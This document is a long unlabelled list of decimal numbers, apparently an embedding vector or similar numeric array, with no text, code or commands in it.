0.019427841529250145, 0.010535662062466145, 0.034526508301496506, -0.007395674008876085, 0.018211930990219116, -0.013568757101893425, 0.024839309975504875, 0.023329444229602814, 0.0010597460204735398, 0.040672868490219116, 0.022100171074271202, -0.020029116421937943, -0.03353774547576904, -0.009767367504537106, -0.019361034035682678, -0.002635585842654109, -0.0019073757575824857, -0.0035642206203192472, -0.01916060782968998, 0.01332156639546156, -0.014590923674404621, -0.002381714526563883, 0.0551568977534771, -0.03377825394272804, -0.006961420644074678, -0.022313958033919334, -0.008678392507135868, 0.0010605810675770044, -0.0063434443436563015, -0.002590490272268653, 0.013542033731937408, 0.007776481099426746, -0.025400500744581223, -0.0055250427685678005, 0.0014931645710021257, -0.02771206572651863, 0.03316361829638481, -0.01157787162810564, 0.015566323883831501, 0.005631936248391867, -0.012860589660704136, 0.011531105265021324, -0.02013600990176201, -0.0020660453010350466, -0.001002123928628862, 0.03030422516167164, -0.017797719687223434, 0.020189454779028893, -0.020857539027929306, 0.0002499046386219561, -0.003908283077180386, 0.004693279974162579, -0.0067643360234797, -0.020536858588457108, 0.03051801212131977, -0.031346436589956284, 0.04703301563858986, -0.00838443636894226, 0.022407490760087967, 0.002952924929559231, 0.002797595923766494, 0.007769800256937742, 0.010595790110528469, -0.0265362411737442, -0.023222550749778748, -0.021204940974712372, 0.03433944657444954, -0.009560261853039265, -0.004142112098634243, 0.016942573711276054, 0.0016359671717509627, -0.012526548467576504, 0.013221354223787785, -0.00011253015691181645, -0.0175037644803524, -0.022674722597002983, -0.019641628488898277, -0.013909479603171349, -0.0019107161788269877, -0.016020620241761208, 0.002007588278502226, -0.0009561931947246194, 0.013348289765417576, 0.01277373917400837, 0.005601872690021992, 0.002795925596728921, 0.019294224679470062, -0.008431201800704002, 0.023008763790130615, 0.006463699042797089, -0.010956554673612118, 0.05659995600581169, -0.0051976824179291725, 0.03308345004916191, -0.015165474265813828, 0.05208371952176094, -0.033751532435417175, 0.004532940220087767, -0.03276276960968971, -0.0066541023552417755, 0.025707818567752838, 0.013622203841805458, 0.024344928562641144, 0.006156381219625473, -0.012179145589470863, -0.021057963371276855, -0.037252284586429596, -0.00440266402438283, 0.01192527450621128, 0.032575707882642746, 0.017022743821144104, 0.012640122324228287, 0.005211044102907181, 0.015285729430615902, 0.04000478610396385, -0.004960513208061457, 0.025400500744581223, -0.01908043771982193, -0.02453199215233326, 0.0022781617008149624, -0.01320131216198206, -0.015486154705286026, -0.01627449132502079, -0.017543848603963852, -0.0016818979056552052, -0.011397489346563816, -0.004238984081894159, -0.006907973904162645, 0.0370919443666935, 0.0026940430980175734, -0.009560261853039265, 0.007095037028193474, 0.02534705400466919, -0.04059269651770592, 0.013448502868413925, -0.023690208792686462, 0.0087518822401762, -0.03249553591012955, -0.008511371910572052, 0.006724251434206963, -0.009212858974933624, 0.0002929124457295984, 0.025159990414977074, -0.025894880294799805, -0.00517763989046216, 0.028086191043257713, -0.02339625172317028, 0.019267501309514046, -0.026629772037267685, 0.011050085537135601, -0.002298203995451331, -0.024879395961761475, 0.002578798681497574, 0.03906947001814842, 0.013962926343083382, -0.004509557504206896, 0.007723034825176001, -0.017343424260616302, -0.004706641659140587, -0.02934218756854534, -0.01515211258083582, -0.05040014907717705, -0.005979339126497507, -0.005909190513193607, 0.007756438571959734, -0.015633132308721542, 0.020723922178149223, 0.0012835536617785692, -0.018572695553302765, 0.01830546371638775, 0.014296967536211014, 0.018866652622818947, -0.013789224438369274, 0.0135286720469594, -0.008090480230748653, 0.010876384563744068, -0.002177949296310544, 0.016782235354185104, 0.010622513480484486, -0.024879395961761475, -0.008798647671937943, 0.02379710227251053, 0.008678392507135868, 0.0041153887286782265, 0.0017203126335516572, -0.007910097949206829, 0.01515211258083582, -0.03372480720281601, -0.0024117780849337578, 0.017811082303524017, -0.016541725024580956, 0.000584572262596339, 0.011323999613523483, 0.009994515217840672, 0.0015374250942841172, 0.006306699477136135, -0.018706312403082848, 0.009900984354317188, -0.010696002282202244, -0.04593735933303833, -0.019133884459733963, 0.005277852527797222, -0.00375796458683908, -0.009259624406695366, -0.020122647285461426, -0.005775574129074812, 0.001687743584625423, -0.007930140011012554, -0.02184629999101162, 0.01381594780832529, -0.01631457731127739, -0.008938944898545742, -0.015285729430615902, -0.002974637784063816, 0.011764934286475182, 0.0033671362325549126, 0.01798478327691555, 0.024919480085372925, 0.01586028002202511, 0.01362888514995575, -0.011437573470175266, -0.024144504219293594, -0.003348764032125473, -0.018853290006518364, -0.011811699718236923, -0.005678702145814896, -0.012920716777443886, -0.009921026416122913, 0.007288780994713306, 0.0182252936065197, -0.0046264720149338245, 0.00511751277372241, 0.01578010991215706, -0.006907973904162645, 0.010709363967180252, -0.009693878702819347, 0.009166092611849308, 0.05040014907717705, -0.0018706312403082848, 0.01234616618603468, -0.025707818567752838, 0.01129059586673975, -0.010034600272774696, -0.008230777457356453, -0.00852473359555006, -0.04227626696228981, -0.005732148420065641, 0.008103841915726662, 0.016180960461497307, 0.0032351899426430464, -0.0033921892754733562, -0.030036993324756622, -0.002339959144592285, -0.0009311400935985148, 0.02001575380563736, 0.0022714808583259583, 0.022166980430483818, 0.009246262721717358, -0.0033287215046584606, 0.031266264617443085, -0.01932094804942608, 0.0047567482106387615, -0.004820215981453657, 0.013869394548237324, -0.013882756233215332, -0.031640391796827316, -0.03482046350836754, -0.006156381219625473, 0.022033363580703735, -0.00525781000033021, 0.0011891870526596904, 0.003390519181266427, 0.009293029084801674, 0.021672599017620087, 0.0357290580868721, -0.038187600672245026, 0.030651628971099854, -0.011223787441849709, -0.01198540162295103, -0.01941448077559471, 0.01704946719110012, -0.006009402684867382, -0.013234715908765793, 0.0009511825628578663, -0.0004739210708066821, -0.022594552487134933, 0.02363676205277443, -0.013962926343083382, -0.00852473359555006, -0.010836299508810043, 0.018131760880351067, 0.00433251541107893, -0.04313141107559204, -0.01770418882369995, -0.012947440147399902, 0.026803473010659218, -0.029101677238941193, 0.03466012328863144, 0.03393859416246414, 0.04537617042660713, -0.025480668991804123, -0.016942573711276054, 0.027030620723962784, -0.017477041110396385, 0.0018555993447080255, 0.016301214694976807, -0.0037479433231055737, -0.004826896823942661, -0.014029733836650848, -0.03599628806114197, -0.00860490370541811, -0.002645607106387615, -0.02612202987074852, 0.01014817412942648, 0.008163969032466412, 0.00819737371057272, -0.0019892158452421427, 0.005491639021784067, 0.02771206572651863, -0.016915850341320038, -0.008130565285682678, 0.02928874082863331, -0.009266305714845657, 0.006934697274118662, 0.0023249273654073477, 0.004275728482753038, 0.023142380639910698, 0.0014021382667124271, -0.02942235767841339, 0.006804421078413725, -0.02757844887673855, 0.0065872943960130215, -0.0132681205868721, 0.005140895489603281, -0.004666557069867849, 0.022327320650219917, 0.00811720360070467, 0.020002393051981926, -0.004673237446695566, -0.004696620628237724, 0.026095306500792503, -0.036049734801054, -0.02079072967171669, 0.03153349831700325, -0.002381714526563883, -0.0018923438619822264, -0.03965738043189049, 0.009854217991232872, -0.029368910938501358, 0.010428769513964653, -0.02486603334546089, -0.05056048929691315, -0.02771206572651863, -0.02717760019004345, 0.026295730844140053, 0.04232971370220184, 0.0022881829645484686, 0.013555395416915417, 0.009226220659911633, 0.03343085199594498, -0.01591372676193714, -0.015178835950791836, -0.039443597197532654, -0.04019184783101082, -0.004178856499493122, 0.014470668509602547, -0.03503425046801567, 0.0016952595906332135, -0.0013228035531938076, 0.008738520555198193, 0.030972309410572052, -0.012579995207488537, 0.015846919268369675, -0.024264760315418243, -0.003223498584702611, -0.03813415393233299, 0.027551725506782532, 0.002637255936861038, 0.01838563196361065, -0.051575977355241776, 0.010836299508810043, -0.007054951973259449, 0.0003822685102932155, -0.008391117677092552, 0.0031617009080946445, 0.02803274430334568, -0.020496774464845657, 0.0050306618213653564, -0.007395674008876085, 0.0229820404201746, -0.02514662779867649, -0.03538165241479874, 0.028593935072422028, 0.020683836191892624, 0.020857539027929306, -0.03666437044739723, -0.014350414276123047, 0.0003474029363133013, 0.0005703755305148661, 0.000007124474450392881, -0.0037479433231055737, 0.0008835392072796822, -0.040378909558057785, 0.019721798598766327, -0.007763119414448738, 0.010061323642730713, -0.0024067675694823265, -0.02632245421409607, 0.0007102552917785943, -0.00310324365273118, -0.00972060114145279, 0.0031015733256936073, -0.016688702628016472, -0.01712963730096817, 0.005184320732951164, -0.008471286855638027, -0.017076190561056137, -0.023610038682818413, -0.017517125234007835, 0.01467109378427267, 0.00317339226603508, 0.04561667889356613, -0.00003515262505970895, 0.005678702145814896, 0.014711178839206696, 0.022166980430483818, -0.014911603182554245, 0.01220586895942688, -0.006901293061673641, 0.008992391638457775, -0.012032167054712772, -0.028754275292158127, -0.028994783759117126, -0.022394128143787384, -0.011203745380043983, -0.009941068477928638, -0.00660065608099103, -0.02461216226220131, 0.003644390497356653, -0.018198570236563683, 0.0090124337002635, 0.022955317050218582, -0.011183702386915684, -0.024318205192685127, 0.003945027478039265, 0.013395056128501892, -0.03503425046801567, -0.008357712998986244, -0.02184629999101162, -0.013622203841805458, 0.09508151561021805, -0.031506773084402084, 0.010816257447004318, -0.004038559272885323, 0.022875146940350533, -0.003308678977191448, 0.03067835234105587, 0.008912221528589725, 0.005027321632951498, 0.007482524961233139, 0.02379710227251053, 0.006730931811034679, 0.02266136184334755, 0.01113025564700365, -0.01212569884955883, 0.008270862512290478, -0.007308823522180319, -0.0005478277453221381, 0.0026105327997356653, 0.01320131216198206, 0.002513660816475749, 0.005772233474999666, -0.017396871000528336, 0.0016643607523292303, 0.00333039159886539, 0.00042193589615635574, 0.0003726648283191025, -0.024077696725726128, -0.013595480471849442, -0.007161845453083515, 0.014283605851233006, -0.02192647010087967, 0.0017269934760406613, -0.019093800336122513, 0.03361791744828224, 0.02200664021074772, -0.0017654082039371133, -0.03343085199594498, 0.015339176170527935, -0.007622822187840939, -0.016915850341320038, -0.013709054328501225, 0.012038848362863064, 0.03776002675294876, -0.004102027043700218, -0.0016777224373072386, -0.02872755192220211, 0.013722416013479233, -0.007282100152224302, -0.01557968556880951, 0.009673835709691048, -0.008457925170660019, 0.0009553580894134939, 0.019013630226254463, -0.009740644134581089, 0.03137315809726715, 0.0017720890464261174, -0.022407490760087967, 0.0021495555993169546, 0.011243829503655434, -0.02234068140387535, -0.006781038362532854, -0.028380148112773895, 0.0017620677826926112, -0.02689700573682785, 0.00289446790702641, -0.004305792041122913, -0.010889746248722076, -0.012005443684756756, 0.02538713812828064, 0.03156021982431412, 0.008718477562069893, -0.007970225065946579, 0.006934697274118662, 0.005611893720924854, 0.008785285986959934, -0.011851784773170948, 0.010094727389514446, 0.00660065608099103, 0.0006822793511673808, -0.007596098817884922, 0.006400231271982193, -0.04003150761127472, -0.009633750654757023, 0.00510749127715826, 0.01769082620739937, -0.020229540765285492, 0.009119327180087566, 0.047300245612859726, -0.007930140011012554, 0.015058581717312336, 0.03471357002854347, -0.0017704188358038664, 0.004355898592621088, -0.0013520321808755398, 0.012005443684756756, 0.006166402250528336, 0.0022865126375108957, -0.041073717176914215, -0.005254469346255064, 0.00483023701235652, 0.024959566071629524, 0.007068313658237457, 0.029181847348809242, -0.021298473700881004, -0.007328866049647331, 0.01627449132502079, 0.006610677111893892, -0.019173970445990562, 0.04179524630308151, -0.0070282286033034325, 0.00044218715629540384, 0.004583046305924654, -0.009052518755197525, -0.002208012854680419, 0.02099115401506424, 0.00874520093202591, 0.015058581717312336, 0.011377446353435516, -0.014390498399734497, -0.031667113304138184, -0.0006789389299228787, 0.007823247462511063, 0.011110213585197926, 0.030090440064668655, -0.0032335196156054735, -0.005621914751827717, -0.004776790272444487, 0.021552344784140587, 0.01599389687180519, 0.000981246237643063, 0.000846377108246088, 0.011310637928545475, 0.008624945767223835, -0.007849969901144505, -0.003921644762158394, 0.007622822187840939, 0.02238076739013195, -0.003560880199074745, -0.008878817781805992, -0.023610038682818413, 0.047754544764757156, -0.00935983657836914, 0.00350409303791821, -0.011644679121673107, -0.027925852686166763, 0.006153040565550327, 0.013067695312201977, 0.014978411607444286, -0.001565818558447063, 0.006323401816189289, -0.017931336537003517, 0.009266305714845657, 0.00377466669306159, -0.018439078703522682, 0.005648638121783733, 0.0017487062141299248, -0.0053279586136341095, 0.011050085537135601, 0.010896426625549793, 0.03917636349797249, -0.012165783904492855, 0.009486773051321507, 0.005621914751827717, -0.010689320974051952, 0.018733035773038864, -0.01798478327691555, -0.05272507667541504, -0.003624347969889641, -0.010769491083920002, 0.004466132260859013, -0.0027408087626099586, -0.003791368566453457, 0.01985541358590126, -0.01741023175418377, 0.012526548467576504, -0.008484648540616035, 0.0031533497385680676, 0.0361299067735672, 0.0006463698809966445, -0.014657732099294662, 0.003091552061960101, 0.007542652543634176, 0.0014597604749724269, -0.0036711138673126698, 0.0032452112063765526, -0.013655607588589191, 0.004522919189184904, -0.03051801212131977, -0.007636183872818947, 0.0018706312403082848, 0.03246881440281868, 0.000034787270124070346, -0.014136627316474915, 0.0070816753432154655, 0.014190074056386948, -0.025133267045021057, -0.0016242758138105273, -0.0021562364418059587, -0.0228617861866951, 0.005277852527797222, -0.043799493461847305, -0.01149770151823759, 0.016421470791101456, -0.010535662062466145, -0.02184629999101162, 0.004897045437246561, -0.0076695880852639675, 0.017717549577355385, 0.0000325690270983614, 0.027525002136826515, -0.01814512349665165, -0.004726684186607599, -0.0038949213922023773, 0.004556323401629925, -0.010021238587796688, -0.007041590288281441, -0.01688912697136402, 0.011905231513082981, -0.03626352176070213, -0.012005443684756756, 0.013709054328501225, 0.00986757967621088, -0.0009745654533617198, 0.031880900263786316, 0.008397798053920269, 0.008738520555198193, -0.0058156587183475494, 0.023663485422730446, 0.013054333627223969, -0.00114659673999995, 0.010128132067620754, -0.021993279457092285, -0.006366827059537172, 0.006440316326916218, -0.00803703349083662, 0.032736048102378845, 0.015833556652069092, -0.023810463026165962, 0.002002577530220151, 0.018091676756739616, 0.013234715908765793, -0.010101408697664738, -0.014270244166254997, -0.01696929708123207, -0.000021255986212054268, 0.010335237719118595, -0.02843359485268593, -0.016862403601408005, 0.019013630226254463, 0.015165474265813828, -0.016688702628016472, 0.015713302418589592, -0.02005583979189396, -0.008898859843611717, 0.020069200545549393, -0.01623440720140934, 0.02958269603550434, 0.007649545557796955, -0.00013069366104900837, -0.00931975245475769, -0.005428170785307884, 0.025948327034711838, -0.00028226489666849375, -0.021351918578147888, 0.018292101100087166, -0.003714539110660553, 0.0030347651336342096, -0.00018768945301417261, -0.007776481099426746, 0.003221828257665038, -0.007562695071101189, 0.01728997752070427, -0.010228344239294529, -0.004720003344118595, 0.00603278586640954, 0.019521372392773628, -0.020269624888896942, -0.010508938692510128, -0.014510753564536572, -0.015446069650352001, 0.01953473500907421, 0.007215291727334261, -0.03332395851612091, 0.021392004564404488, -0.017837805673480034, -0.027284491807222366, 0.006006062496453524, -0.019387757405638695, -0.0019107161788269877, -0.0013286492321640253, 0.005241107661277056, 0.03955049067735672, -0.018198570236563683, -0.02200664021074772, 0.035702332854270935, 0.025413861498236656, 0.019508011639118195, -0.004035218618810177, 0.006480400916188955, 0.019481288269162178, 0.00426236679777503, -0.002002577530220151, 0.003884900128468871, -0.009620388969779015, -0.007816566154360771, -0.017543848603963852, -0.01521892100572586, 0.006313380319625139, -0.011631317436695099, -0.010315194725990295, 0.005986019968986511, -0.009025795385241508, 0.028513764962553978, -0.009553580544888973, -0.00944000668823719, 0.012726972810924053, 0.0000030794431040703785, 0.008798647671937943, 0.006056168582290411, -0.0017770996782928705, -0.004486174322664738, -0.01855933479964733, -0.019026992842555046, 0.012506506405770779, -0.023035487160086632, 0.018893375992774963, -0.007723034825176001, -0.0029128401074558496, -0.014109903946518898, -0.0022698105312883854, -0.00946004968136549, -0.002628905000165105, -0.025280244648456573, -0.012606718577444553, -0.03412565961480141, 0.02192647010087967, 0.00029082471155561507, -0.015646494925022125, 0.013314886018633842, -0.016955936327576637, 0.014377137646079063, 0.012239272706210613, -0.014924964867532253, -0.04152801260352135, -0.003924984950572252, 0.00004653090945794247, 0.01663525588810444, -0.023890633136034012, -0.003049796912819147, -0.013495268300175667, 0.017156360670924187, 0.01908043771982193, 0.008912221528589725, 0.008858774788677692, 0.005110831931233406, -0.008885498158633709, 0.00923958234488964, 0.012880632653832436, -0.021913109347224236, -0.022808339446783066, 0.03412565961480141, -0.036316968500614166, -0.0024501928128302097, 0.02632245421409607, 0.010769491083920002, 0.0038581769913434982, 0.010716044344007969, -0.005935913883149624, 0.011885189451277256, -0.0036009650211781263, -0.012479783035814762, -0.006106274668127298, 0.009800771251320839, 0.00033174475538544357, 0.007535971701145172, 0.009914345107972622, -0.002966286614537239, -0.007836609147489071, 0.01941448077559471, -0.006400231271982193, -0.038962576538324356, -0.005641957279294729, 0.0023265976924449205, -0.03511442244052887, 0.02234068140387535, -0.0006254923064261675, -0.008865456096827984, -0.0013678991235792637, 0.006640740670263767, -0.006974782329052687, 0.014390498399734497, -0.008163969032466412, 0.015339176170527935, -0.028246531262993813, 0.050106193870306015, 0.00809716060757637, -0.0035207951441407204, -0.03099903278052807, 0.012873951345682144, 0.03466012328863144, 0.0060828919522464275, -0.013007568195462227, 0.004259026609361172, -0.010248387232422829, -0.012245954014360905, -0.0069146547466516495, -0.021712683141231537, 0.022407490760087967, -0.02160579152405262, -0.006019424181431532, 0.019013630226254463, 0.0007908427505753934, -0.011464296840131283, -0.004135431256145239, 0.015312452800571918, 0.003544178092852235, 0.013515310361981392, -0.024304844439029694, 0.0032034560572355986, 0.012586675584316254, 0.022728169336915016, -0.02123166434466839, -0.017664102837443352, 0.010629193857312202, -0.025494031608104706, 0.0015182177303358912, 0.002052683848887682, -0.018024867400527, -0.030865415930747986, 0.00040377239929512143, -0.002635585842654109, -0.0021412046626210213, -0.006861208006739616, 0.03690488263964653, 0.016207683831453323, -0.010609151795506477, -0.003410561475902796, -0.026469431817531586, 0.005180980544537306, 0.007723034825176001, -0.006577272899448872, -0.012165783904492855, 0.01871967315673828, -0.024585438892245293, -0.01318126916885376, 0.009553580544888973, 0.015259006060659885, -0.007796523626893759, -0.027818959206342697, 0.0035775823052972555, 0.0025637669023126364, 0.01611415110528469, 0.012312762439250946, 0.01503185834735632, 0.014577561989426613, -0.002301544416695833, 0.01761065609753132, 0.010635875165462494, 0.01234616618603468, -0.0053580221720039845, 0.012526548467576504, 0.003804730251431465, 0.01070268265902996, -0.001572499400936067, 0.012058890424668789, 0.021298473700881004, -0.025173351168632507, -0.0013069366104900837, 0.015552962198853493, 0.007943501695990562, 0.012546590529382229, -0.0013804256450384855, 0.01712963730096817, 0.02856721170246601, -0.008184012025594711, -0.02652287855744362, -0.009079242125153542, -0.00310324365273118, -0.007482524961233139, 0.02067047543823719, 0.00958030391484499, -0.015058581717312336, 0.014484030194580555, -0.0024518631398677826, 0.016167597845196724, -0.0049838959239423275, 0.0008660020539537072, -0.004055261146277189, 0.028914613649249077, 0.01941448077559471, -0.007736396510154009, 0.00255374563857913, 0.03543509915471077, 0.013174588792026043, 0.024505268782377243, 0.009126008488237858, -0.010255067609250546, 0.018038230016827583, -0.03786692023277283, -0.023048849776387215, -0.019173970445990562, 0.016621895134449005, 0.013555395416915417, 0.017917975783348083, 0.03821432217955589, -0.030090440064668655, 0.012586675584316254, 0.0019457904854789376, -0.01255327183753252, -0.0175037644803524, -0.00016827329818625003, 0.011758253909647465, 0.005822339560836554, -0.018011506646871567, 0.0027291174046695232, 0.0003248551511205733, -0.004723343998193741, 0.016955936327576637, 0.020764006301760674, -0.0183455478399992, 0.004041899461299181, 0.004252345766872168, -0.032201580703258514, 0.004292430821806192, 0.01977524533867836, -0.007883374579250813, 0.005875786300748587, -0.007041590288281441, 0.004593067802488804, -0.014978411607444286, 0.011043405160307884, -0.0070282286033034325, -0.02608194388449192, 0.0036644330248236656, -0.00860490370541811, -0.011437573470175266, -0.0021044600289314985, 0.003961729817092419, 0.007382312323898077, -0.0028961380012333393, -0.00020512222545221448, -0.01659517176449299, 0.024358291178941727, -0.0013077716575935483, 0.007963544689118862, 0.009473411366343498, 0.00726205762475729, 0.020857539027929306, 0.006336763501167297, -0.009313071146607399, -0.013568757101893425, -0.018158484250307083, -0.005304575897753239, 0.005732148420065641, 0.005792276002466679, -0.03153349831700325, -0.018452441319823265, -0.026055220514535904, -0.0002699471078813076, 0.0027357982471585274, 0.004479493945837021, 0.016140874475240707, 0.008364394307136536, 0.012005443684756756, 0.0049003856256604195, -0.0025186713319271803, 0.00811720360070467, 0.025039736181497574, 0.004709982313215733, 0.01932094804942608, 0.015259006060659885, 0.0016008928650990129, 0.00585908442735672, -0.004252345766872168, 0.007769800256937742, 0.00972728244960308, -0.017022743821144104, 0.01712963730096817, 0.009346474893391132, 0.005922552198171616, 0.0003056477871723473, 0.003674454288557172, -0.017557211220264435, 0.0027942555025219917, -0.01737014763057232, -0.010361961089074612, 0.01318126916885376, -0.031961072236299515, 0.019628265872597694, 0.01989549957215786, 0.020349794998764992, -0.0031717221718281507, -0.00184390798676759, 0.015486154705286026, -0.034927356988191605, 0.002087758155539632, 0.011390808038413525, 0.015138750895857811, 0.015633132308721542, -0.008310947567224503, 0.01741023175418377, 0.014684455469250679, 0.007034909445792437, -0.013341609388589859, -0.017998144030570984, 0.007215291727334261, -0.020363157615065575, -0.011965358629822731, 0.007422397378832102, -0.005207703914493322, -0.014203435741364956, -0.002582139102742076, -0.009085923433303833, 0.006854527164250612, -0.01049557700753212, -0.008885498158633709, -0.0071284412406384945, -0.00803703349083662, -0.008938944898545742, 0.015713302418589592, 0.002331608207896352, 0.0027040643617510796, -0.00653050746768713, 0.007141802925616503, -0.004880343098193407, 0.023863909766077995, -0.03861517459154129, 0.004112048074603081, -0.0014898241497576237, 0.0036143267061561346, 0.004369260277599096, -0.0007257047109305859, 0.02433156780898571, -0.01733006164431572, 0.04369259998202324, -0.020242901518940926, -0.006553890183568001, 0.004309132695198059, -0.016742149367928505, 0.02315574325621128, -0.020764006301760674, -0.024024249985814095, -0.003717879531905055, -0.02083081565797329, -0.0024835970252752304, 0.023382890969514847, -0.0008843743125908077, 0.003009712090715766, 0.0027274470776319504, 0.011450935155153275, 0.022768255323171616, -0.008518053218722343, 0.004877002909779549, -0.00033988701761700213, -0.006817782763391733, -0.004603088833391666, -0.011424211785197258, -0.004011835902929306, -0.0177442729473114, 0.013682330958545208, 0.02779223583638668, 0.003378827590495348, 0.0225411057472229, 0.012433016672730446, -0.010809576138854027, 0.011477658525109291, 0.020042477175593376, 0.00468993978574872, 0.006376848090440035, -0.002009258372709155, 0.006216508336365223, -0.00025220116367563605, -0.01417671237140894, -0.014083180576562881, -0.029395634308457375, -0.01941448077559471, 0.0017654082039371133, -0.009219539351761341, -0.004249005112797022, 0.009272986091673374, 0.0034439656883478165, 0.021512258797883987, -0.008578180335462093, 0.008644988760352135, 0.022607915103435516, 0.009560261853039265, -0.013034291565418243, 0.01920069381594658, -0.0012827186146751046, 0.00443606823682785, -0.009146050550043583, -0.018278740346431732, 0.0022831722162663937, -0.014270244166254997, -0.028460318222641945, 0.0024401715490967035, -0.0015165475197136402, -0.011825061403214931, -0.0013495268067345023, 0.011043405160307884, 0.013675650581717491, -0.01647491566836834, -0.011644679121673107, -0.004382621962577105, -0.007729715667665005, -0.009206177666783333, -0.02306221053004265, -0.015512877143919468, 0.0014096542727202177, 0.008304266259074211, -0.0012585006188601255, -0.0054582348093390465, 0.024184590205550194, -0.0033704766537994146, -0.022607915103435516, -0.015018496662378311, -0.015138750895857811, 0.013167907483875751, -0.008471286855638027, 0.0006639070925302804, -0.007141802925616503, 0.0047701094299554825, 0.006420273799449205, -0.0016977648483589292, -0.038508281111717224, -0.001047219499014318, -0.01757057197391987, 0.0022380766458809376, 0.0019340991275385022, 0.012392931617796421, 0.015245644375681877, 0.015058581717312336, -0.008190692402422428, -0.000026162219000980258, -0.007662907242774963, 0.01424352079629898, 0.0001724488101899624, -0.016461554914712906, 0.0007332206587307155, 0.018358908593654633, 0.006253253202885389, -0.007181887980550528, 0.012272677384316921, -0.008204054087400436, 0.0013395055430009961, -0.00626661442220211, -0.011096851900219917, -0.011404169723391533, 0.0056252554059028625, -0.00670420890673995, 0.01676887273788452, 0.013214673846960068, 0.011644679121673107, 0.015285729430615902, -0.014657732099294662, -0.012005443684756756, 0.029609419405460358, -0.012994206510484219, -0.000302724918583408, -0.0061129555106163025, 0.019948946312069893, 0.009212858974933624, 0.0007152659236453474, -0.004990576766431332, -0.013642245903611183, -0.008304266259074211, -0.01269356906414032, 0.026883643120527267, -0.0012484793551266193, -0.006837825290858746, -0.009393241256475449, 0.015058581717312336, -0.013709054328501225, -0.018252016976475716, -0.006821122951805592, 0.02234068140387535, -0.0018672908190637827, 0.01127055287361145, 0.017223168164491653, 0.01537926122546196, -0.02047005109488964, -0.007489205803722143, -0.006874569691717625, 0.03409893438220024, -0.017036106437444687, -0.018492525443434715, -0.01586028002202511, -0.007903416641056538, -0.020897623151540756, -0.00494381133466959, 0.012827185913920403, -0.0071952491998672485, 0.0013311546063050628, -0.021632514894008636, 0.01475126389414072, -0.03161366656422615, 0.0045863869599998, 0.024598801508545876, -0.01579347252845764, 0.0037846877239644527, -0.01912052370607853, 0.001694424427114427, -0.00868507381528616, 0.016180960461497307, 0.0013779203873127699, 0.007355589419603348, 0.006106274668127298, -0.002079406986013055, -0.007395674008876085, 0.022594552487134933, 0.0028660742100328207, -0.014350414276123047, 0.013962926343083382, -0.026015136390924454, 0.007235334254801273, -0.00032067965366877615, 0.010829619131982327, 0.011551148258149624, -0.0006046147318556905, -0.0047701094299554825, -0.008023671805858612, 0.0040853251703083515, -0.006116296164691448, -0.0017637379933148623, -0.006797740235924721, 0.011671402491629124, -0.027124153450131416, 0.013354971073567867, -0.008785285986959934, -0.015633132308721542, -0.00024760811356827617, -0.026803473010659218, 0.009199497289955616, -0.007068313658237457, -0.006363486405462027, -0.022674722597002983, -0.013595480471849442, -0.0018305463017895818, -0.0030798607040196657, -0.026870282366871834, -0.004720003344118595, 0.011911912821233273, 0.012192507274448872, -0.00003671844388009049, -0.004362579435110092, 0.005935913883149624, 0.005892488174140453, -0.007041590288281441, -0.017677465453743935, 0.003981772344559431, 0.006209827493876219, 0.0029044889379292727, 0.010969916358590126, 0.0042456649243831635, -0.011938636191189289, -0.012600037269294262, -0.02998354658484459, -0.00350409303791821, -0.007155164610594511, 0.017717549577355385, 0.014938326552510262, -0.00952017679810524, -0.028246531262993813, -0.0041688354685902596, -0.01015485543757677, 0.0006797740352340043, -0.008611584082245827, -0.008143926970660686, 0.013568757101893425, -0.024117780849337578, -0.0013578778598457575, 0.014003011398017406, -0.008016991429030895, 0.02616211399435997, -0.012907355092465878, 0.01249314472079277, 0.00326024298556149, -0.02278161607682705, -0.0023716932628303766, -0.0012568304082378745, 0.016541725024580956, -0.003263583406805992, -0.019267501309514046, -0.010328556410968304, -0.011223787441849709, 0.006821122951805592, 0.015833556652069092, -0.010168217122554779, -0.025988413020968437, 0.008083798922598362, -0.0028627337887883186, -0.006510464940220118, 0.0358893945813179, 0.03527475893497467, -0.006687506567686796, -0.0024902778677642345, 0.013455183245241642, -0.008878817781805992, 0.01961490511894226, 0.035087697207927704, -0.002956265350803733, -0.012092295102775097, 0.00751592917367816, -0.00427238829433918, 0.0090124337002635, 0.01197872031480074, -0.0033604553900659084, -0.016621895134449005, -0.0015507866628468037, -0.01157787162810564, -0.0023934058845043182, 0.00262389425188303, 0.004629812203347683, 0.021472174674272537, 0.0005691228434443474, -0.018238654360175133, 0.007910097949206829, -0.04118061065673828, 0.02469233237206936, 0.01753048785030842, -0.004923768807202578, 0.004305792041122913, 0.021204940974712372, -0.012312762439250946, 0.010822937823832035, -0.0007566035492345691, 0.002936223056167364, -0.015005134977400303, 0.013441821560263634, -0.007602779660373926, 0.0006856197724118829, -0.007856651209294796, 0.012018805369734764, 0.0001495878677815199, -0.030036993324756622, 0.008925583213567734, -0.010315194725990295, -0.023129019886255264, 0.003039775649085641, 0.011684764176607132, -0.012352846562862396, 0.00036577522405423224, -0.014978411607444286, -0.024505268782377243, 0.004008495714515448, -0.0021228324621915817, 0.012934078462421894, 0.006981463171541691, -0.0002279831824125722, 0.02037651836872101, 0.008918902836740017, -0.005261150188744068, -0.0050306618213653564, -0.010074685327708721, -0.004015176557004452, -0.018198570236563683, -0.025641009211540222, 0.0031533497385680676, -0.024478545412421227, -0.007161845453083515, -0.031506773084402084, 0.010889746248722076, 0.010275110602378845, 0.00045972433872520924, -0.006583953741937876, -0.03252226114273071, 0.008377755992114544, 0.0017269934760406613, -0.008832051418721676, -0.0022063427604734898, 0.0007378137088380754, 0.02212689444422722, -0.022487659007310867, 0.014764624647796154, 0.007181887980550528, -0.014510753564536572, -0.0008969008922576904, -0.01615423709154129, -0.018051590770483017, -0.014310329221189022, 0.0022380766458809376, -0.019668351858854294, -0.02059030532836914, 0.011972039937973022, -0.009533538483083248, -0.00840447936207056, -0.018238654360175133, 0.024144504219293594, 0.003477369900792837, 0.03043784201145172, 0.008057075552642345, -0.006724251434206963, -0.01854597218334675, 0.006026105023920536, -0.020723922178149223, 0.00486364122480154, 0.009166092611849308, -0.002461884403601289, -0.012974163517355919, -0.016060706228017807, -0.03979099914431572, 0.0030381055548787117, 0.005264490842819214, -0.004850279539823532, -0.010395364835858345, -0.0058390418998897076, 0.017196444794535637, 0.01263344194740057, 0.006994824856519699, -0.01197872031480074, 0.009740644134581089, -0.010936511680483818, -0.006854527164250612, 0.013034291565418243, 0.012366208247840405, -0.024278121069073677, 0.0011975379893556237, -0.013020929880440235, -0.007395674008876085, 0.0074090356938540936, 0.008611584082245827, -0.0007286275504156947, -0.0132681205868721, -0.035862673074007034, 0.004509557504206896, 